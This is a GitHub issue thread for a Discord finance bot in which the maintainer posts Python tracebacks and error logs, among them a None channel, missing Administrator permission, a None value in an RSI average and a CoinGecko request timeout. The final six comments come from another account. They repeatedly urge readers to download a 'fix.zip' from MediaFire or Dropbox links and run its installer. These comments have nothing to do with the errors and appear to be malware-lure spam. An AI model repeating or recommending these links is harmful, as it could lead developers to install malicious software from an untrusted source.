### ISSUE TITLE
Bugs :(

### ISSUE THREAD

**Issue by StephanAkkerman** [StephanAkkerman/fintwit-bot#634]
20/08/2024 06:18:28 - ERROR - Error in cms_scraper
Traceback (most recent call last):
  File "/home/akkie100/fintwit-bot/src/util/disc.py", line 17, in wrapper
    return await func(*args, **kwargs)
  File "/home/akkie100/fintwit-bot/src/cogs/loops/reddit.py", line 79, in cms_scraper
    await self.send_posts(posts, "CryptoMoonShots")
  File "/home/akkie100/fintwit-bot/src/cogs/loops/reddit.py", line 89, in send_posts
    await self.send_embed(embed, img_urls, channel)
  File "/home/akkie100/fintwit-bot/src/cogs/loops/reddit.py", line 123, in send_embed
    await channel.send(embed=embed)
AttributeError: 'NoneType' object has no attribute 'send'

- Fixed: issue with self.first_time duplicate

**Comment by StephanAkkerman** [comment]
Ignoring exception in command restart:
Traceback (most recent call last):
  File "/home/akkie100/.local/lib/python3.9/site-packages/discord/bot.py", line 1137, in invoke_application_command
    await ctx.command.invoke(ctx)
  File "/home/akkie100/.local/lib/python3.9/site-packages/discord/commands/core.py", line 432, in invoke
    await self.prepare(ctx)
  File "/home/akkie100/.local/lib/python3.9/site-packages/discord/commands/core.py", line 353, in prepare
    if not await self.can_run(ctx):
  File "/home/akkie100/.local/lib/python3.9/site-packages/discord/commands/core.py", line 460, in can_run
    return await async_all(predicate(ctx) for predicate in predicates)  # type: ignore
  File "/home/akkie100/.local/lib/python3.9/site-packages/discord/utils.py", line 705, in async_all
    for elem in gen:
  File "/home/akkie100/.local/lib/python3.9/site-packages/discord/commands/core.py", line 460, in <genexpr>
    return await async_all(predicate(ctx) for predicate in predicates)  # type: ignore
  File "/home/akkie100/.local/lib/python3.9/site-packages/discord/ext/commands/core.py", line 2138, in predicate
    raise MissingPermissions(missing)
discord.ext.commands.errors.MissingPermissions: You are missing Administrator permission(s) to run this command.

**Comment by StephanAkkerman** [comment]
20/08/2024 18:18:02 - ERROR - Error in post_rsi_heatmap
Traceback (most recent call last):
  File "/home/akkie100/fintwit-bot/src/util/disc.py", line 17, in wrapper
    return await func(*args, **kwargs)
  File "/home/akkie100/fintwit-bot/src/cogs/loops/rsi_heatmap.py", line 63, in post_rsi_heatmap
    await plot_rsi_heatmap()
  File "/home/akkie100/fintwit-bot/src/cogs/loops/rsi_heatmap.py", line 105, in plot_rsi_heatmap
    average_rsi = np.mean(rsi_values)
  File "/home/akkie100/.local/lib/python3.9/site-packages/numpy/core/fromnumeric.py", line 3504, in mean
    return _methods._mean(a, axis=axis, dtype=dtype,
  File "/home/akkie100/.local/lib/python3.9/site-packages/numpy/core/_methods.py", line 118, in _mean
    ret = umr_sum(arr, axis, dtype, out, keepdims, where=where)
TypeError: unsupported operand type(s) for +: 'float' and 'NoneType'

**Comment by StephanAkkerman** [comment]
20/08/2024 12:19:09 - ERROR - Error in crypto_categories
Traceback (most recent call last):
  File "/home/akkie100/fintwit-bot/src/util/disc.py", line 17, in wrapper
    return await func(*args, **kwargs)
  File "/home/akkie100/fintwit-bot/src/cogs/loops/trending.py", line 238, in crypto_categories
    df = await get_top_categories()
  File "/home/akkie100/fintwit-bot/src/api/coingecko.py", line 355, in get_top_categories
    html = session.get("https://www.coingecko.com/en/categories").text
  File "/home/akkie100/.local/lib/python3.9/site-packages/tls_client/sessions.py", line 459, in get
    return self.execute_request(method="GET", url=url, **kwargs)
  File "/home/akkie100/.local/lib/python3.9/site-packages/tls_client/sessions.py", line 442, in execute_request
    raise TLSClientExeption(response_object["body"])
tls_client.exceptions.TLSClientExeption: failed to do request: Get "https://www.coingecko.com/en/categories": net/http: request canceled (Client.Timeout exceeded while awaiting headers)
20/08/2024 13:39:25 - ERROR - Error in get_tweet(): 'entries'

**Comment by StephanAkkerman** [comment]
15/08/2024 14:58:59 - ERROR - Error getting result key in parse_tweet()
24/08/2024 20:59:48 - ERROR - Error in get_tweet(): 'entries'
19/08/2024 01:04:17 - ERROR - Error getting tweet key in parse_tweet()
15/08/2024 18:18:38 - ERROR - Error in cms_scraper

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
